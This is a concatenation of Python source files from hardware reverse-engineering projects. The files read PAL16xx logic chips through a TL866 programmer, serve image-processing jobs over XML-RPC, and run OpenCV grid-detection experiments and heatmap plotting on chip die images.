addr, word_comb, word_ff = json.loads(l)
assert word_ff is None
buff[addr] = word_comb
open(fnout, "wb").write(buff)
def main():
import argparse
parser = argparse.ArgumentParser(description='Read PAL device')
parser.add_argument("--verbose", action="store_true")
parser.add_argument("fnin")
parser.add_argument("fnout", nargs='?')
args = parser.parse_args()
run(fnin=args.fnin, fnout=args.fnout, verbose=args.verbose)
if __name__ == "__main__":
main()
```
#### File: JohnDMcMaster/pal866/pal16xx.py
```python
from otl866 import bitbang, util
from otl866 import aclient
import binascii
import json
import time
# ZIF20 pin 1 indexed to ezzif 40 pin 0 indexed
dip20_to_zif_ = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, \
31, 32, 33, 34, 35, 36, 37, 38, 39, 40]
dip20_to_zif = dict([(i + 1, x - 1) for i, x in enumerate(dip20_to_zif_)])
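# e.g. DIP pin 1 -> ZIF index 0, DIP pin 10 -> ZIF index 9, DIP pin 11 -> ZIF index 30, DIP pin 20 -> ZIF index 39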
"""
Each state
-Parent state(s)
-Non-self child states for each possible input both clocked and unclocked
"""
"""
class State:
def __init__(self):
# (input, output, isclk) to state
self.parents = {}
# (input, output, isclk) to state
self.children = {}
def add_closed_states(closed, tests):
ret = set()
for (addr, word_comb, word_clk) in tests:
closed.add((addr, word_comb, False))
closed.add((addr, word_clk, True))
return ret
def add_open_states(open, tests):
for (addr, word_comb, word_clk) in tests:
pass
"""
class PAL16XXReader:
def __init__(self, tl, part, input_pins=[]):
assert part in ("PAL16L8", "PAL16R4", "PAL16R6", "PAL16R8")
self.part = part
if self.part == "PAL16L8":
self.P_CLK = None
self.P_OEn = None
self.I_LINES = [1, 2, 3, 4, 5, 6, 7, 8, 9, 11]
# 13-18 are I/O
self.O_LINES = [12, 19]
self.IO_LINES = []
# Manually specify input pins
if input_pins is not None:
for pin in input_pins:
assert 13 <= pin <= 18
for pin in range(13, 19):
if pin in input_pins:
self.I_LINES.append(pin)
else:
self.O_LINES.append(pin)
            # Otherwise leave 13-18 as unknown I/O to be solved automatically
else:
self.IO_LINES = [13, 14, 15, 16, 17, 18]
else:
self.P_CLK = 1
self.P_OEn = 11
# 15 bit address => A14 max
# 27C128
self.I_LINES = [2, 3, 4, 5, 6, 7, 8, 9]
# LSB to MSB
            self.O_LINES = [12, 13, 14, 15, 16, 17, 18, 19]
            self.IO_LINES = []
self.I_LINES_base = sorted(self.I_LINES)
self.O_LINES_base = sorted(self.O_LINES)
self.I_LINES = self.I_LINES_base
self.O_LINES = self.O_LINES_base
print("I_LINES: %s" % (self.I_LINES,))
print("O_LINES: %s" % (self.O_LINES,))
print("IO_LINES: %s" % (self.IO_LINES,))
self.P_VCC = 20
self.P_GND = 10
self.tl = tl
self.reset()
def dip20s_to_zif(self, pins20):
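        # e.g. dip20s_to_zif([1, 20]) -> 0x8000000001 (ZIF bits 0 and 39 set)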
return sum([1 << dip20_to_zif[x] for x in pins20])
def addr_to_pin20s(self, addr):
"""
Return pins that should be set high
"""
ret = []
for biti, pin in enumerate(self.I_LINES):
if addr & (1 << biti):
ret.append(pin)
return ret
def ez2data(self, zif_val):
'''
Given socket state as integer mask, return the current data byte on data bus
'''
# LSB to MSB
ret = 0
for biti, pin20 in enumerate(self.O_LINES):
# print("check d", zif_val, biti, pin20)
if (1 << dip20_to_zif[pin20]) & zif_val:
ret |= 1 << biti
# print("ez2data: 0x%010X => 0x%02X" % (zif_val, ret))
return ret
def inputs_p20(self):
        ret = list(self.I_LINES)
if self.P_CLK is not None:
ret += [self.P_CLK]
if self.P_OEn is not None:
ret += [self.P_OEn]
return ret
def reset(self):
self.tl.vdd_en(False)
self.tl.gnd_pins(0)
# All high impedance by default
tristate = 0xFFFFFFFFFF
for pin in self.inputs_p20():
tristate ^= 1 << dip20_to_zif[pin]
self.tl.io_tri(tristate)
# Set voltages
self.tl.gnd_pins(self.dip20s_to_zif([self.P_GND]))
self.tl.vdd_pins(self.dip20s_to_zif([self.P_VCC]))
self.tl.vdd_volt(aclient.VDD_51)
# Set all pins low
self.tl.io_w(0)
# self.tl.io_w(pin20s_to_ez([P_CLK, P_OEn]))
self.tl.vdd_en()
def quick_reset(self):
"""
# Cut power, ground rail
self.tl.vdd_pins(0)
self.tl.vdd_en(False)
self.tl.io_w(0)
self.tl.io_tri(0)
self.tl.gnd_pins(0xFFFFFFFFFF)
time.sleep(0.1)
self.tl.io_tri(0xFFFFFFFFFF)
self.tl.gnd_pins(0)
self.reset()
"""
# Cut power, ground rail briefly
self.tl.vdd_pins(0)
self.tl.gnd_pins(self.dip20s_to_zif([self.P_VCC, self.P_GND]))
self.tl.gnd_pins(self.dip20s_to_zif([self.P_GND]))
self.tl.vdd_pins(self.dip20s_to_zif([self.P_VCC]))
def sweep_combclk_io(self, clk):
"""
Read every address and return the resulting data
Static value + dynamic value
"Registers are triggered on the high going edge"
"""
print("Solver: sweep_combclk_io()")
yield {"solver": "sweep_combclk_io"}
for addr in range(self.words()):
# for addr in [0xCA]:
print("Addr 0x%04X / 0x%04X" % (addr, self.words()))
# print("pass 1")
# Clock low, OEn low
self.tl.io_w(self.dip20s_to_zif(self.addr_to_pin20s(addr)))
word_comb = self.ez2data(self.tl.io_r())
print(" comb: 0x%02X" % word_comb)
if clk:
assert self.P_CLK is not None
# print("pass 2")
# Clock high, OEn low
self.tl.io_w(self.dip20s_to_zif([self.P_CLK] + self.addr_to_pin20s(addr)))
word_clk = self.ez2data(self.tl.io_r())
print(" clk: 0x%02X" % word_clk)
else:
word_clk = None
yield {"A": addr, "D_comb": word_comb, "D_clk": word_clk}
def setup_io(self, opins=[]):
self.I_LINES = list(self.I_LINES_base)
self.O_LINES = list(self.O_LINES_base)
for pin in self.IO_LINES:
if pin in opins:
self.O_LINES.append(pin)
else:
self.I_LINES.append(pin)
self.I_LINES = sorted(self.I_LINES)
self.O_LINES = sorted(self.O_LINES)
def iomap(self):
"""
Return a string in pin order
I: input
O: output
Z: tristate (RFU)
P: power
G: ground
C: clock
0/1: fixed value
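        Example (registered part, default pinout): "CIIIIIIIIG0OOOOOOOOP"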
"""
ret = list("?" * 20)
ret[self.P_VCC - 1] = "P"
ret[self.P_GND - 1] = "G"
for pin in self.I_LINES:
ret[pin - 1] = "I"
for pin in self.O_LINES:
ret[pin - 1] = "O"
if self.P_CLK is not None:
ret[self.P_CLK - 1] = "C"
if self.P_OEn is not None:
ret[self.P_OEn - 1] = "0"
assert "?" not in ret
return "".join(ret)
def sweep_combclk_ioio(self):
"""
Read every address and return the resulting data
There are 6 unknown I/O lines
Solve these by keeping one as output each pass and treating others as inputs
TL866 has 1.2k resistor on ZIF that should keep chip safe w/ bus contention
"""
print("Solver: sweep_combclk_ioio()")
yield {"solver": "sweep_combclk_ioio"}
for this_opini, this_opin in enumerate(self.IO_LINES):
print("")
self.setup_io(opins=[this_opin])
iomap = self.iomap()
print("io %u / %u, io %s" % (this_opini + 1, len(self.IO_LINES), iomap))
for addr in range(self.words()):
# for addr in [0xCA]:
print("Addr 0x%04X / 0x%04X" % (addr, self.words()))
# print("pass 1")
# Clock low, OEn low
self.tl.io_w(self.dip20s_to_zif(self.addr_to_pin20s(addr)))
word_comb = self.ez2data(self.tl.io_r())
print(" comb: 0x%02X" % word_comb)
yield {"A": addr, "D_comb": word_comb, "io": iomap}
def wr_clk(self, addr, clk=False):
# clk = not clk
if clk:
self.tl.io_w(self.dip20s_to_zif([self.P_CLK] + self.addr_to_pin20s(addr)))
else:
self.tl.io_w(self.dip20s_to_zif(self.addr_to_pin20s(addr)))
return self.ez2data(self.tl.io_r())
def state_reset(self, parents):
"""Reset if FFs are in target state"""
iref, oref = parents[-1]
now = self.wr_clk(iref)
print(" state_reset(): wanted 0x%02X => 0x%02X, got 0x%02X" % (iref, oref, now))
if now == oref:
return
print(" state_reset() running")
self.quick_reset()
# Now walk state to get back to original
for stepi, (iref, oref) in enumerate(parents):
# Power on
if stepi == 0:
out = self.wr_clk(iref, False)
else:
out = self.wr_clk(iref, True)
print(" state_reset(): %u 0x%02X => 0x%02X, got 0x%02X" % (stepi, iref, oref, out))
if oref != out:
print(parents)
print(stepi, iref, oref)
raise Exception("Failed to recreate state")
def recursive_solver(self, found_states=set(), parents=[]):
# (input, output)
ret = []
self.reset()
if not parents:
print("Solver: recursive_solver()")
yield {"solver": "recursive"}
# Baseline power on at address 0
parents.append((0, self.wr_clk(0, False)))
print("Sweeping, %u found states" % len(found_states))
print("Parents (%u)" % len(parents))
for parent in parents:
print(" ", parent)
pending_recurse = {}
if 0 and len(parents) == 1:
itr = [0xA7]
else:
itr = range(self.words())
for addr in itr:
print("Addr 0x%02X" % (addr,))
self.state_reset(parents)
word_comb = self.wr_clk(addr, False)
word_clkp = self.wr_clk(addr, True)
# Falling clock edge shouldn't change logic
word_clkn = self.wr_clk(addr, False)
print(" addr 0x%02X: comb 0x%02X, clkp 0x%02X, clkn 0x%02X, change %u" % (addr, word_comb, word_clkp, word_clkn, word_comb != word_clkp))
if word_clkp != word_clkn:
print("")
print("")
print("")
print("Fail")
while True:
print("")
time.sleep(1)
word_comb = self.wr_clk(addr, False)
time.sleep(1)
word_clkp = self.wr_clk(addr, True)
time.sleep(1)
# Falling clock edge shouldn't change logic
word_clkn = self.wr_clk(addr, False)
print(" addr 0x%02X: comb 0x%02X, clkp 0x%02X, clkn 0x%02X, change %u" % (addr, word_comb, word_clkp, word_clkn, word_comb != word_clkp))
raise Exception("Bad clock transition")
ret.append({"A": addr, "D_comb": word_comb, "D_clk": word_clkp})
if word_clkp not in found_states:
found_states.add(word_clkp)
pending_recurse[word_clkp] = addr
print("Checking %u pending recursions" % len(pending_recurse))
for iteri, (word_clk, addr) in enumerate(pending_recurse.items()):
print("")
print("Recursing on %u / %u (0x%02X, 0x%02X)" % (iteri + 1, len(pending_recurse), addr, word_clk))
child_parents = parents + [(addr, word_clk)]
for x in self.recursive_solver(found_states=found_states, parents=child_parents):
yield x
print("Returned, depth now %u" % len(parents))
def is_clkless(self, words):
"""
Registers are directly on the output
See if anything changed
"""
for (_addr, word_comb, word_clk) in words:
if word_comb != word_clk:
return False
return True
def words(self):
return 1 << len(self.I_LINES)
def run(self, fnout=None):
try:
self.tl.led(1)
# When clockless just brute force all inputs
if self.P_CLK is None:
if len(self.IO_LINES):
out = self.sweep_combclk_ioio()
else:
out = self.sweep_combclk_io(False)
# Otherwise explore FF states
else:
out = self.recursive_solver()
solver_header = next(out)
"""
# All states reached so far
closed_list = set()
add_closed_states(baseline, closed_list)
open_list = add_open_states(closed_list, baseline)
"""
if fnout:
def write_out(f, output):
for out in output:
f.write(json.dumps(out, sort_keys=True) + "\n")
f = open(fnout, "w")
jheader = {
"part": self.part,
"I_bits": len(self.I_LINES),
"words": self.words(),
"O_bits": len(self.O_LINES),
"pins": {
"CLK": self.P_CLK,
"OEn": self.P_OEn,
"I": self.I_LINES,
"O": self.O_LINES,
"IO": self.IO_LINES,
"VCC": self.P_VCC,
"GND": self.P_GND,
},
"soliver": solver_header,
}
write_out(f, [jheader])
write_out(f, out)
finally:
self.tl.init()
self.tl.led(0)
def run(port=None, part=None, fnout=None, input_pins=[], verbose=False):
tl = bitbang.Bitbang(port, verbose=verbose)
reader = PAL16XXReader(tl, part=part, input_pins=input_pins)
reader.run(fnout=fnout)
def main():
import argparse
parser = argparse.ArgumentParser(description='Read PAL device')
parser.add_argument('--port',
default=util.default_port(),
help='Device serial port')
parser.add_argument("--input-pins", default=None, help="Comma separated list of I/Os as inputs")
parser.add_argument("--verbose", action="store_true")
parser.add_argument('--part', required=True)
parser.add_argument("fnout", nargs='?')
args = parser.parse_args()
input_pins = None
if args.input_pins is not None:
input_pins = [int(x) for x in args.input_pins.split(",")]
run(port=args.port, part=args.part, fnout=args.fnout, input_pins=input_pins, verbose=args.verbose)
if __name__ == "__main__":
main()
``` |
{
"source": "JohnDMcMaster/pr0ntools",
"score": 3
} |
#### File: capture/cf/server.py
```python
import argparse
from multiprocessing import Process, Queue
from Queue import Empty
import time
import os
import shutil
import glob
import traceback
import multiprocessing
import json
from util import add_bool_arg
from SimpleXMLRPCServer import SimpleXMLRPCServer
from xmlrpclib import Binary
import datetime
class Server(object):
def __init__(self, indir, verbose=False):
self.running = True
self.server = None
self.indir = indir
self.verbose = verbose
# Unallocated
self.todo = set()
# Client has requested but not completed
self.outstanding = {}
self.completed = set()
def add_dir(self, indir):
# out.png means it should have completed successfully
# alternatively open every json file and see if it looks okay
print 'Scanning for new jobs: %s' % indir
for fn in glob.glob(indir + '/*/out.png'):
base = os.path.dirname(fn)
print ' Adding: %s' % base
self.todo.add(base)
print 'Scan complete'
def run(self):
print 'Building job list'
self.add_dir(self.indir)
print 'Starting server'
server = SimpleXMLRPCServer((args.bind, args.port), logRequests=self.verbose, allow_none=True)
server.register_introspection_functions()
server.register_multicall_functions()
#server.register_instance(self.rpc)
server.register_function(self.job_req, "job_req")
server.register_function(self.job_done, "job_done")
server.serve_forever()
'''
RPC
'''
def job_req(self):
try:
if args.reserve and len(self.todo) == 0:
print 'reserve: reloading'
self.outstanding = {}
self.completed = set()
self.add_dir(self.indir)
'''
In order to process the client needs:
-Output image (out.png)
-Image for grid (cropped or original if not rotating)
-Offsets into the original image (out.json)
'''
try:
base = self.todo.pop()
except KeyError:
# No jobs to hand out
print 'WARNING: client requested job but no jobs'
return None
print 'Allocating %s' % base
j = json.load(open(os.path.join(base, 'out.json')))
if j['pass'] != True:
raise Exception("Bad job %s" % base)
ret = {
'name': base,
'png': Binary(open(os.path.join(base, j['png'])).read()),
'img': Binary(open(os.path.join(base, j['img'])).read()),
'json': j,
}
self.outstanding[base] = {
'ret': ret,
# so can timeout clients that don't complete jobs
'tstart': time.time(),
}
return ret
except:
traceback.print_exc()
raise
'''
new_png may be None indicating the job was rejected
In this case msg must be set
Otherwise msg is optional
'''
def job_done(self, base, new_png, msg):
try:
print 'Completed: %s: %s' % (base, new_png is not None)
submit = self.outstanding[base]
print 'Time: %0.1f' % (time.time() - submit['tstart'],)
if new_png is not None:
open(os.path.join(base, 'sweep.png'), 'w').write(new_png.data)
open(os.path.join(base, 'sweep.txt'), 'w').write(msg)
self.completed.add(base)
del self.outstanding[base]
except:
traceback.print_exc()
raise
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Grid auto-bitmap test')
# ord('pr') = 28786
parser.add_argument('--port', type=int, default=28786, help='TCP port number')
parser.add_argument('--bind', default='localhost', help='Address to bind to')
add_bool_arg(parser, '--debug', default=False)
add_bool_arg(parser, '--reserve', default=False)
parser.add_argument('dir', help='Directory to nom')
args = parser.parse_args()
s = Server(args.dir, args.debug)
s.run()
```
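The server registers exactly two RPC entry points, `job_req` and `job_done`. A minimal sketch of a matching client, assuming the default bind address and port (Python 2, like the server):
```python
import xmlrpclib
proxy = xmlrpclib.ServerProxy('http://localhost:28786', allow_none=True)
job = proxy.job_req()
if job is None:
    print 'No jobs available'
else:
    # png/img arrive as xmlrpclib.Binary wrappers; .data holds the raw bytes
    png_bytes = job['png'].data
    # ... do the actual grid / bitmap processing here ...
    result = xmlrpclib.Binary(png_bytes)  # placeholder: echo the input back
    proxy.job_done(job['name'], result, 'processed by example client')
```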
#### File: cf/test/02_angle.py
```python
import cv2
import numpy as np
import argparse
import pylab
import matplotlib
import os
from collections import Counter
from PIL import Image, ImageDraw, ImageStat
from scipy import fftpack
import random
import matplotlib.pyplot as plt
import sys
from scipy.optimize import leastsq
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='CV test')
parser.add_argument('fn_in', help='image file to process')
args = parser.parse_args()
outdir = '02_angle'
if not os.path.exists(outdir):
os.mkdir(outdir)
if 0:
img = cv2.imread(args.fn_in)
gray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)
edges = cv2.Canny(gray,50,150,apertureSize = 3)
lines = cv2.HoughLines(edges,1,np.pi/1800,400)
for rho,theta in lines[0]:
a = np.cos(theta)
b = np.sin(theta)
x0 = a*rho
y0 = b*rho
x1 = int(x0 + 1000*(-b))
y1 = int(y0 + 1000*(a))
x2 = int(x0 - 1000*(-b))
y2 = int(y0 - 1000*(a))
cv2.line(img,(x1,y1),(x2,y2),(0,0,255),2)
cv2.imwrite(os.path.join(outdir, 'houghlines3_hi.jpg'),img)
if 0:
img = cv2.imread(args.fn_in)
gray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)
edges = cv2.Canny(gray,50,150,apertureSize = 3)
minLineLength = 100
maxLineGap = 10
# TypeError: <unknown> is not a numpy array
lines = cv2.HoughLinesP(edges,1,np.pi/180,100,minLineLength,maxLineGap)
for x1,y1,x2,y2 in lines[0]:
cv2.line(img,(x1,y1),(x2,y2),(0,255,0),2)
cv2.imwrite('houghlines5.jpg',img)
# graph theta distribution
'''
    1 degree was too coarse
    0.1 degree seems okay
    200 points produced a bad result but 400 seems to be pretty good
'''
if 0:
img = cv2.imread(args.fn_in)
gray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)
edges = cv2.Canny(gray,50,150,apertureSize = 3)
lines = cv2.HoughLines(edges,1,np.pi/1800.,400)
d = []
for rho,theta in lines[0]:
theta = theta * 180. / np.pi
# take out outliers
# I usually snap to < 1.5 so this should be plenty of margin
if theta < 3.0:
#print 'Theta: %g, rho: %g' % (theta, rho)
d.append(theta)
matplotlib.pyplot.clf()
pylab.hist(d, bins=100)
pylab.savefig(os.path.join(outdir, 'theta_dist_hi.png'))
# from a quick test in gimp
ideal = 0.94
# 400 point average
pre_meas = 0.889583
if 0:
angle = Counter(d).most_common(1)[0]
#angle_deg = angle * 180/np.pi
print 'Most common angle: %f (%d times)' % (angle[0], angle[1])
angle = angle[0]
# Off a little but better than original
if 1:
angle = sum(d) / len(d)
print 'Mean angle: %f' % (angle,)
im = Image.open(args.fn_in)
#im.save(os.path.join(outdir, 'orig.png'))
im = im.rotate(angle, resample=Image.BICUBIC)
im.save(os.path.join(outdir, 'rotate_hi.png'))
if 0:
img = cv2.imread(args.fn_in)
gray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)
for thresh1 in [1, 10, 100, 250]:
for thresh2 in [1, 10, 100, 250]:
print
print thresh1, thresh2
# threshold1 - first threshold for the hysteresis procedure.
# threshold2 - second threshold for the hysteresis procedure.
edges = cv2.Canny(gray, thresh1, thresh2, apertureSize=3)
x0s = []
y0s = []
lines = cv2.HoughLines(edges,1,np.pi/1800,400)
linei = 0
if lines is None:
print 'WARNING: failed'
continue
for rho,theta in lines[0]:
a = np.cos(theta)
b = np.sin(theta)
x0 = a * rho
y0 = b * rho
scal = 2000
x1 = int(x0 + scal * -b)
y1 = int(y0 + scal * a)
x2 = int(x0 - scal * -b)
y2 = int(y0 - scal * a)
# only keep vertical lines for now
# these will have thetas close to 0 or pi
d = 0.1
if theta > 0 - d and theta < 0 + d or theta > np.pi - d and theta < np.pi + d:
x0s.append(abs(rho))
cv2.line(img, (x1,y1),(x2,y2),(0, 0, 255),2)
elif theta > np.pi/2 - d and theta < np.pi/2 + d or theta > 3 * np.pi / 2 - d and theta < 3 * np.pi / 2 + d:
y0s.append(abs(rho))
else:
cv2.line(img, (x1,y1),(x2,y2),(0, 255, 0),2)
continue
cv2.imwrite(os.path.join(outdir, 'thresh_%03d_%03d.png' % (thresh1, thresh2)),img)
print 'x0s: %d' % len(x0s)
if len(x0s) == 0:
print " WARNING: no lines"
print 'y0s: %d' % len(y0s)
if len(y0s) == 0:
print " WARNING: no lines"
import sys
sys.exit(1)
x0sd_roi = []
x0sd_all = []
for i in xrange(len(x0s)):
for j in xrange(i):
d = abs(x0s[i] - x0s[j])
x0sd_all.append(d)
if d < 100:
x0sd_roi.append(d)
print 'x0s: %d' % len(x0s)
matplotlib.pyplot.clf()
pylab.hist(x0sd_all, bins=100)
pylab.savefig(os.path.join(outdir, 'rotate_lines_histx_all.png'))
matplotlib.pyplot.clf()
pylab.hist(x0sd_roi, bins=100)
pylab.savefig(os.path.join(outdir, 'rotate_lines_histx_roi.png'))
if 0:
matplotlib.pyplot.clf()
pylab.hist(y0sd, bins=100)
pylab.savefig(os.path.join(outdir, 'rotate_lines_histy.png'))
if 0:
print 'writing to %s' % outdir
img = cv2.imread(args.fn_in)
print type(img)
gray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)
cv2.imwrite(os.path.join(outdir, 'reduce_01_gray.png'), gray)
print type(gray)
edges = cv2.Canny(gray, 125, 250, apertureSize=3)
cv2.imwrite(os.path.join(outdir, 'reduce_02_edges.png'), edges)
print type(edges)
print len(edges)
sums = []
for row in edges:
sums.append(np.sum(row))
matplotlib.pyplot.clf()
plt.plot(sums)
pylab.savefig(os.path.join(outdir, 'reduce.png'))
# Find the highest value and annotate image
maxes = []
for i in xrange(5):
mval = max(sums)
ymax = sums.index(mval)
cv2.line(img, (0, ymax), (1527, ymax), (0, 0, 255), 2)
sums[ymax] = 0.0
cv2.imwrite(os.path.join(outdir, 'reduce_03_mark.png'), img)
# {'h': 0, 'o': 0, 'v': 78}
#lines = cv2.HoughLines(edges, 1, np.pi/1800, 400)
# {'h': 0, 'o': 0, 'v': 443}
#lines = cv2.HoughLines(edges, 1, np.pi/1800, 200)
# {'h': 0, 'o': 0, 'v': 723}
#lines = cv2.HoughLines(edges, 1, np.pi/1800, 150)
# {'h': 0, 'o': 0, 'v': 957}
#lines = cv2.HoughLines(edges, 1, np.pi/1800, 125)
lines = cv2.HoughLines(edges, 1, np.pi/1800, 115)
# {'h': 115, 'o': 34, 'v': 1494}
#lines = cv2.HoughLines(edges, 1, np.pi/1800, 100)
linei = 0
lc = {'h':0, 'v':0, 'o': 0}
for rho,theta in lines[0]:
# only keep vertical lines for now
# these will have thetas close to 0 or pi
d = 0.1
a = np.cos(theta)
b = np.sin(theta)
x0 = a * rho
y0 = b * rho
scal = 2000
x1 = int(x0 + scal * -b)
y1 = int(y0 + scal * a)
x2 = int(x0 - scal * -b)
y2 = int(y0 - scal * a)
if theta > 0 - d and theta < 0 + d or theta > np.pi - d and theta < np.pi + d:
lc['v'] += 1
#cv2.line(img,(x1,y1),(x2,y2),(0, 255, 0),2)
elif theta > np.pi/2 - d and theta < np.pi/2 + d or theta > 3 * np.pi / 2 - d and theta < 3 * np.pi / 2 + d:
print 'hor line'
cv2.line(img,(x1,y1),(x2,y2),(255, 0, 0),2)
lc['h'] += 1
else:
print 'other line'
cv2.line(img, (x1,y1),(x2,y2),(255, 255, 0),2)
lc['o'] += 1
print lc
cv2.imwrite(os.path.join(outdir, 'reduce_04_hough.png'), img)
sys.exit(1)
# works for one but not both axes
if 1:
print 'writing to %s' % outdir
img = cv2.imread(args.fn_in)
print type(img)
gray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)
print type(gray)
edges = cv2.Canny(gray, 125, 250, apertureSize=3)
print type(edges)
print 'Edges: %d' % len(edges)
sums = []
for row in edges:
sums.append(np.sum(row))
matplotlib.pyplot.clf()
plt.plot(sums)
pylab.savefig(os.path.join(outdir, 'reduce_r.png'))
if 0:
print 'writing to %s' % outdir
img = cv2.imread(args.fn_in)
print type(img)
gray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)
cv2.imwrite(os.path.join(outdir, 'reduce_01_gray.png'), gray)
print type(gray)
edges = cv2.Canny(gray, 125, 250, apertureSize=3)
print type(edges)
cv2.imwrite(os.path.join(outdir, 'reduce_02_edges.png'), edges)
#test = cv2.cvtColor(edges)
test = cv2.cv.GetMat(edges)
rowr = cv2.reduce(edges, 0, cv2.cv.CV_REDUCE_SUM)
colr = cv2.reduce(edges, 0, cv2.cv.CV_REDUCE_SUM)
matplotlib.pyplot.clf()
plt.subplot(211)
plt.plot(rowr)
plt.subplot(212)
plt.plot(colr)
pylab.savefig(os.path.join(outdir, 'reduce.png'))
matplotlib.pyplot.clf()
plt.plot(rowr)
pylab.savefig(os.path.join(outdir, 'reduce_r.png'))
matplotlib.pyplot.clf()
plt.plot(colr)
pylab.savefig(os.path.join(outdir, 'reduce_c.png'))
def dbg_grid(im):
'''Draw a grid onto the image to see that it lines up'''
im = im.copy()
draw = ImageDraw.Draw(im)
# +1: draw right bounding box
for c in xrange(cols + 1):
(m, b) = self.grid_lins[0]
x = int(m * c + b)
draw.line((x, 0, x, im.size[1]), fill=128)
for r in xrange(rows + 1):
(m, b) = self.grid_lins[1]
y = int(m * r + b)
draw.line((0, y, im.size[0], y), fill=128)
del draw
im.save(os.path.join(outdir, 'reduce_05_grid.png'))
del im
def gridify_offsets(self, m, x0s, y0s):
'''
        Now that we know the line pitch we need to fit it back to the original x and y data
Pitch is known, just play with offsets
Try to snap points to offset and calculate the error
        Calculate regression on pixels to get row/col pixel offset for grid lines
xline = col * m + b
'''
#points = sorted(x0s)
def res(p, points):
(b,) = p
err = []
for x in points:
xd = (x - b) / m
err.append(xd % 1)
return err
imw, imh = self.preproc_im.size
print 'X: regressing %d lines' % len(x0s)
(xres, _cov_x) = leastsq(res, [m/2], args=(x0s,))
print 'Optimal X offset: %s' % xres[0]
grid_xlin = (m, xres[0])
self.cols = int((imw - grid_xlin[1])/grid_xlin[0])
print 'Y: regressing %d lines' % len(y0s)
(yres, _cov_y) = leastsq(res, [m/2], args=(y0s,))
print 'Optimal Y offset: %s' % yres[0]
grid_ylin = (m, yres[0])
self.rows = int((imh - grid_ylin[1])/grid_ylin[0])
self.grid_lins = (grid_xlin, grid_ylin)
self.dbg_grid()
if 0:
angle2 = 1
im = Image.open(args.fn_in)
im = im.rotate(angle2)
F1 = fftpack.fft2(im)
print F1
if 0:
img = cv2.imread(args.fn_in)
gray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)
edges = cv2.Canny(gray,50,150,apertureSize = 3)
x0s = []
lines = cv2.HoughLines(edges,1,np.pi/1800,400)
linei = 0
for rho,theta in lines[0]:
# only keep vertical lines for now
# these will have thetas close to 0 or pi
d = 0.1
if not (theta > 0 - d and theta < 0 + d or theta > 3.14 - d and theta < 3.14 + d):
continue
a = np.cos(theta)
b = np.sin(theta)
x0 = a * rho
y0 = b * rho
scal = 2000
x1 = int(x0 + scal * -b)
y1 = int(y0 + scal * a)
x2 = int(x0 - scal * -b)
y2 = int(y0 - scal * a)
# filter out lines at edge (lots of issues due to rotation)
#if x0 < 40 or y0 < 40:
# continue
x0s.append(abs(rho))
if 0:
print rho, theta
print ' ', x0, y0
print ' ', x1, y1, x2, y2
cv2.line(img,(x1,y1),(x2,y2),(0, 0, 255),2)
cv2.imwrite(os.path.join(outdir, 'rotate_lines.jpg'),img)
x0sd_roi = []
x0sd_all = []
for i in xrange(len(x0s)):
for j in xrange(i):
d = abs(x0s[i] - x0s[j])
x0sd_all.append(d)
if d < 100:
x0sd_roi.append(d)
print 'x0s: %d' % len(x0s)
# attempt to auto-cluster
# try to find the largest clusters along the same level of detail
print x0sd_roi
matplotlib.pyplot.clf()
pylab.hist(x0sd_roi, bins=100)
pylab.savefig(os.path.join(outdir, 'rotate_lines_histx_roi.png'))
```
#### File: pr0ntools/capture/example.py
```python
from PIL import Image
import os
import sys
from opencv.cv import *
from opencv.highgui import *
def analyzeImage(f,name):
im=Image.open(f)
try:
if(im.size[0]==1 or im.size[1]==1):
return
print (name+' : '+str(im.size[0])+','+ str(im.size[1]))
le=1
if(type(im.getpixel((0,0)))==type((1,2))):
le=len(im.getpixel((0,0)))
gray = cvCreateImage (cvSize (im.size[0], im.size[1]), 8, 1)
edge1 = cvCreateImage (cvSize (im.size[0], im.size[1]), 32, 1)
edge2 = cvCreateImage (cvSize (im.size[0], im.size[1]), 8, 1)
#edge3 = cvCreateImage (cvSize (im.size[0], im.size[1]), 32, 3)
for h in range(im.size[1]):
for w in range(im.size[0]):
p=im.getpixel((w,h))
if(type(p)==type(1)):
gray[h][w] = im.getpixel((w,h))
else:
gray[h][w] = im.getpixel((w,h))[0]
cvCornerHarris(gray,edge1,5,5,0.1)
cvCanny(gray,edge2,20,100)
cvNamedWindow("Grayscale")
cvShowImage("Grayscale", gray);
cvNamedWindow("Corner (Harris)")
cvShowImage("Corner (Harris)", edge1);
cvNamedWindow("Canny")
cvShowImage("Canny", edge2);
cvWaitKey()
f.close()
except Exception,e:
print e
print 'ERROR: problem handling '+ name
f = open(sys.argv[1],'r')
analyzeImage(f,sys.argv[1])
```
#### File: capture/tem/pp.py
```python
import json
from PIL import Image
import os
import numpy as np
import math
BIT_WH = 256
'''
{
u'bestk': 1,
u'res': [1.1362289094663497e-140, 3.902074920347574e-09],
u'pois': [574.7407407407408, 62.46765565962602],
u'meta': {
u'txt_fn': u'sega_315-5571_xpol_train2/sega_315-5571_xpol_17_27.txt',
u'glob_loc': [138, 223],
u'tile_loc': [2, 7],
u'lr': u'r',
u'im_fn': u'sega_315-5571_xpol_train2/sega_315-5571_xpol_17_27.png',
u'im_loc': [17, 27]
}
}
'''
def heatmap(j, fn_out, rg):
'''
Scale from green being the best matches to red being the worst
Black is no data
white: (255, 255, 255)
red: (255, 0, 0)
    green: (0, 255, 0)
'''
im = Image.new("RGB", (BIT_WH, BIT_WH), "black")
# Start by building a map of all of the scores
scores = np.zeros(BIT_WH * BIT_WH)
for run in j['runs']:
col, row = run['meta']['glob_loc']
scores[row * BIT_WH + col] = run['res'][run['bestk']]
print 'Worst score: %g' % np.min(scores)
print 'Best score: %g' % np.max(scores)
scoresl = np.log(scores)
smin = np.min(scoresl)
smax = np.max(scoresl)
print 'Worst score: %g' % smin
print 'Best score: %g' % smax
# Normalize to 0 to 1
scoresn = (scoresl - smin) / (smax - smin)
print 'Worst score: %g' % np.min(scoresn)
print 'Best score: %g' % np.max(scoresn)
# red green
if rg:
for biti, score in enumerate(scoresn):
g = int(255 * score)
x = biti % BIT_WH
y = biti / BIT_WH
im.putpixel((x, y), (255 - g, g, 0))
# white bad
else:
